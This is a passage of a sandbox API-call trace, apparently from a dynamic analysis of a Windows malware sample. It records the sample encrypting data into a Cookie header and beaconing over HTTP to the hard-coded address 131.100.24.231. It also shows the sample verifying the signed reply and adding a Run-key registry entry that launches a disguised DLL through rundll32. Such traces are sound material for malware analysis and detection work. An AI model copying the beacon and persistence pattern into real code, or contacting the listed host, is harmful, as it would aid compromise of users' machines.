returned 1 [0268.391] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0268.391] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0268.391] FindNextFileW (in: hFindFile=0x2a83960, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0268.391] FindClose (in: hFindFile=0x2a83960 | out: hFindFile=0x2a83960) returned 1 [0268.391] GetProcessHeap () returned 0x530000 [0268.391] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x5afeb0 [0268.391] GetProcessHeap () returned 0x530000 [0268.391] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd70e0 [0268.391] GetProcessHeap () returned 0x530000 [0268.391] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1810 [0268.392] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0268.393] GetProcessHeap () returned 0x530000 [0268.393] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd70e0 | out: hHeap=0x530000) returned 1 [0268.393] GetProcessHeap () returned 0x530000 [0268.393] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1810 | out: hHeap=0x530000) returned 1 [0268.393] GetProcessHeap () returned 0x530000 [0268.393] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2aa3df0 [0268.393] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0268.393] GetProcessHeap () returned 0x530000 [0268.394] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa3df0 | out: hHeap=0x530000) returned 1 [0268.394] GetProcessHeap () returned 0x530000 [0268.394] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0268.394] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0268.394] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x5afeb0, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0268.394] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0268.394] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0268.394] GetProcessHeap () returned 0x530000 [0268.394] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0268.394] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0268.394] GetProcessHeap () returned 0x530000 [0268.394] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76420 [0268.394] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0268.395] GetProcessHeap () returned 0x530000 [0268.395] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0268.395] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0268.395] GetProcessHeap () returned 0x530000 [0268.395] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xce) returned 0x2ad2ae0 [0268.395] GetProcessHeap () returned 0x530000 [0268.395] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0268.395] GetProcessHeap () returned 0x530000 [0268.395] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0268.395] CryptBinaryToStringW (in: pbBinary=0x2ad2ae0, cbBinary=0xce, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0268.395] GetProcessHeap () returned 0x530000 [0268.395] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x22a) returned 0x5f3428 [0268.396] CryptBinaryToStringW (in: pbBinary=0x2ad2ae0, cbBinary=0xce, dwFlags=0x40000001, pszString=0x5f3428, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgAbkzKoAQ+taDRe5u2csOL6fL6UDA1MAdC8BRUlzzhpd3JQa4z8sL8cHjXUaBg=", pcchString=0x2cf504) returned 1 [0268.396] GetProcessHeap () returned 0x530000 [0268.396] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0268.396] GetProcessHeap () returned 0x530000 [0268.396] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2aa3878 [0268.396] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: rrlSd=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgAbkzKoAQ+taDRe5u2csOL6fL6UDA1MAdC8BRUlzzhpd3JQa4z8sL8cHjXUaBg=\r\n") returned 292 [0268.396] GetProcessHeap () returned 0x530000 [0268.396] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa3878 | out: hHeap=0x530000) returned 1 [0268.396] GetProcessHeap () returned 0x530000 [0268.396] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5f3428 | out: hHeap=0x530000) returned 1 [0268.396] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0268.397] GetProcessHeap () returned 0x530000 [0268.397] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0268.397] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0268.400] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="KCickUNfNVdluezRJQVzrSVrPGCcfHpSXQkeXoIVLkiGTdBPKaPPgeHI", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0268.400] GetProcessHeap () returned 0x530000 [0268.400] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0268.400] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0268.400] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0268.401] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0268.401] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: rrlSd=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgAbkzKoAQ+taDRe5u2csOL6fL6UDA1MAdC8BRUlzzhpd3JQa4z8sL8cHjXUaBg=\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0269.538] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0269.538] GetProcessHeap () returned 0x530000 [0269.538] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0269.539] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x141) returned 1 [0269.539] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47f41, dwNumberOfBytesToRead=0xfebf, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47f41*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0269.539] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0269.539] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0269.539] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0269.539] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0269.539] GetProcessHeap () returned 0x530000 [0269.539] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0269.539] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0269.539] GetProcessHeap () returned 0x530000 [0269.539] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7248 [0269.540] GetProcessHeap () returned 0x530000 [0269.540] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1810 [0269.540] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0269.551] GetProcessHeap () returned 0x530000 [0269.551] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7248 | out: hHeap=0x530000) returned 1 [0269.552] GetProcessHeap () returned 0x530000 [0269.552] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1810 | out: hHeap=0x530000) returned 1 [0269.552] GetProcessHeap () returned 0x530000 [0269.552] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f90 [0269.552] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0269.552] GetProcessHeap () returned 0x530000 [0269.552] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f90 | out: hHeap=0x530000) returned 1 [0269.552] GetProcessHeap () returned 0x530000 [0269.552] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0269.552] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0269.552] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0269.552] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0269.552] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0269.552] GetProcessHeap () returned 0x530000 [0269.552] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0269.552] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0269.553] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0269.554] GetProcessHeap () returned 0x530000 [0269.554] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c6c0 [0269.554] GetProcessHeap () returned 0x530000 [0269.554] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0269.554] GetProcessHeap () returned 0x530000 [0269.555] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0269.555] GetProcessHeap () returned 0x530000 [0269.555] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad2ae0 | out: hHeap=0x530000) returned 1 [0269.555] GetProcessHeap () returned 0x530000 [0269.555] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0269.555] GetProcessHeap () returned 0x530000 [0269.555] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0269.555] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0269.555] GetProcessHeap () returned 0x530000 [0269.556] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a839e0 [0269.556] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",ytcumrnBp") returned 99 [0269.556] GetProcessHeap () returned 0x530000 [0269.556] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a839e0 | out: hHeap=0x530000) returned 1 [0269.556] GetProcessHeap () returned 0x530000 [0269.556] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0269.556] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x670, lpdwDisposition=0x0) returned 0x0 [0269.556] GetProcessHeap () returned 0x530000 [0269.557] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0269.557] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",ytcumrnBp") returned 99 [0269.557] RegSetValueExW (in: hKey=0x670, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",ytcumrnBp", cbData=0xc8 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",ytcumrnBp") returned 0x0 [0269.557] RegCloseKey (hKey=0x670) returned 0x0 [0269.558] GetProcessHeap () returned 0x530000 [0269.558] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c6c0 | out: hHeap=0x530000) returned 1 [0269.558] GetProcessHeap () returned 0x530000 [0269.558] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5afeb0 | out: hHeap=0x530000) returned 1 [0269.558] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xdf9d2) returned 0x102 [0279.603] GetProcessHeap () returned 0x530000 [0279.603] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7248 [0279.603] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0279.603] GetProcessHeap () returned 0x530000 [0279.603] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7248 | out: hHeap=0x530000) returned 1 [0279.604] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0279.604] GetProcessHeap () returned 0x530000 [0279.604] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7248 [0279.604] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0279.604] GetProcessHeap () returned 0x530000 [0279.604] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7248 | out: hHeap=0x530000) returned 1 [0279.604] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a839e0 [0279.606] FindNextFileW (in: hFindFile=0x2a839e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0279.606] FindNextFileW (in: hFindFile=0x2a839e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0279.606] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0279.606] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0279.607] FindNextFileW (in: hFindFile=0x2a839e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0279.607] FindClose (in: hFindFile=0x2a839e0 | out: hFindFile=0x2a839e0) returned 1 [0279.607] GetProcessHeap () returned 0x530000 [0279.607] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x5afeb0 [0279.607] GetProcessHeap () returned 0x530000 [0279.607] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7248 [0279.607] GetProcessHeap () returned 0x530000 [0279.607] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1810 [0279.608] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0279.609] GetProcessHeap () returned 0x530000 [0279.609] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7248 | out: hHeap=0x530000) returned 1 [0279.609] GetProcessHeap () returned 0x530000 [0279.610] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1810 | out: hHeap=0x530000) returned 1 [0279.610] GetProcessHeap () returned 0x530000 [0279.610] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f90 [0279.610] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0279.610] GetProcessHeap () returned 0x530000 [0279.610] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f90 | out: hHeap=0x530000) returned 1 [0279.610] GetProcessHeap () returned 0x530000 [0279.610] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0279.610] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0279.611] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x5afeb0, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0279.611] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0279.611] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0279.611] GetProcessHeap () returned 0x530000 [0279.611] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0279.611] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0279.611] GetProcessHeap () returned 0x530000 [0279.611] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76420 [0279.611] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0279.611] GetProcessHeap () returned 0x530000 [0279.611] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0279.611] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0279.611] GetProcessHeap () returned 0x530000 [0279.611] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x109) returned 0x2a89918 [0279.611] GetProcessHeap () returned 0x530000 [0279.612] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0279.612] GetProcessHeap () returned 0x530000 [0279.612] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0279.612] CryptBinaryToStringW (in: pbBinary=0x2a89918, cbBinary=0x109, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0279.612] GetProcessHeap () returned 0x530000 [0279.612] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2ca) returned 0x2aa4e48 [0279.612] CryptBinaryToStringW (in: pbBinary=0x2a89918, cbBinary=0x109, dwFlags=0x40000001, pszString=0x2aa4e48, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTiwyAKSKp7qrr8s98AHrQ9ZP4kEam2Row/w8nMtSKfUPnkOQpMaxrSN49fYGfOiyFwmty0V3Z7PPUzCifDnc5n5enAfRsVk2J1wtksa3rRXbw1C3RXVd5KutPBKWrkqj6TGqdsnABIHI2w==", pcchString=0x2cf504) returned 1 [0279.612] GetProcessHeap () returned 0x530000 [0279.612] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0279.612] GetProcessHeap () returned 0x530000 [0279.613] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63080 [0279.613] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: 